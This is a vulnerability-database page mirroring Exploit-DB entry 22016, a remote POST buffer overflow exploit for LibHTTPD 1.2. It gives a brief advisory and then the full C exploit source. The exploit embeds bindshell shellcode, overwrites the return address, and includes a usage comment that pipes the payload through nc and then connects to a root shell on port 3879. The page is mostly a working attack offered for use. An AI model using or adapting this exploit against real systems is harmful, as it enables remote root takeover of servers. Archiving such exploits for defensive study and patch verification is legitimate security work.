Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbXpl017ElzEDB-ID:22016
HistoryNov 13, 2002 - 12:00 a.m.

LibHTTPD 1.2 - POST Buffer Overflow

2002-11-1300:00:00
Xpl017Elz
www.exploit-db.com
32

AI Score

7.4

Confidence

Low

JSON
// source: https://www.securityfocus.com/bid/6172/info

LibHTTPD is vulnerable to a buffer overflow condition. By passing a POST request of excessive length, it is possible to overrun a static buffer. This may result in sensitive locations in memory being overwritten by attacker-supplied values.

Successful exploitation of this vulnerability may allow an attacker to execute arbitrary code with super user privileges.

It should be noted that this vulnerability was reported in LibHTTPD v1.2. It is not yet known whether earlier versions are affected. 

/*
**
** Lib HTTPd Remote Buffer Overflow exploit
**                             by Xpl017Elz
** __
** Testing exploit:
**
** bash$ (./0x82-Remote.libhttpdxpl;cat)|nc libhttphost 80
**
** (Ctrl+c)
** punt!
** bash$ nc libhttphost 3879
** uname
** Linux
** id
** uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),
** 3(sys),4(adm),6(disk),10(wheel)
** exit
** bash$
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <[email protected]>.
** My World: http://x82.i21c.net
**
*/

#include <stdio.h>
int main(/* args? */)
{
    int shadd2r;
    char b1ndsh[] = /* 129byte bindshellcode */
        "\211\3451\322\262f\211\3201\311\211\313C\211]\370C\211]\364K\211M\374\215M"
        "\364\315\2001\311\211E\364Cf\211]\354f\307E\356\017'\211M\360\215E\354\211E"
        "\370\306E\374\020\211\320\215M\364\315\200\211\320CC\315\200\211\320C\315"
        "\200\211\3031\311\262?\211\320\315\200\211\320A\315\200\353\030^\211u"
        "\b1\300\210F\007\211E\f\260\013\211\363\215M\b\215U\f\315\200\350\343\377"
        "\377\377/bin/sh";
    //--- POST &shellcode ---//
    fprintf(stdout,"POST ");
    for(shadd2r=0;shadd2r<0x408;shadd2r+=4)
    {/* rEDhAT Default: 0x804e482,
        Debian Address? */
        fprintf(stdout,"\202\344\004\b");
    }
    fprintf(stdout,"\r\n");
    //--- NOP,shellcode ---//
    for(shadd2r=0;shadd2r<0x3e8;shadd2r++)
    {/* SSSSSSSS...SSSSSSSSS;;; */
        fprintf(stdout,"S");
    }
    fprintf(stdout,"%s\r\nx0x\r\nx82\r\nl0l\r\n",b1ndsh);
}

Related

cvelist 1
nvd 1
cve 1
cvelist
cvelist
CVE-2002-2400
2007-11-01 17:00:00
nvd
nvd
CVE-2002-2400
2002-12-31 05:00:00
cve
cve
CVE-2002-2400
2007-11-01 17:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:22016
cvelist1nvd1cve1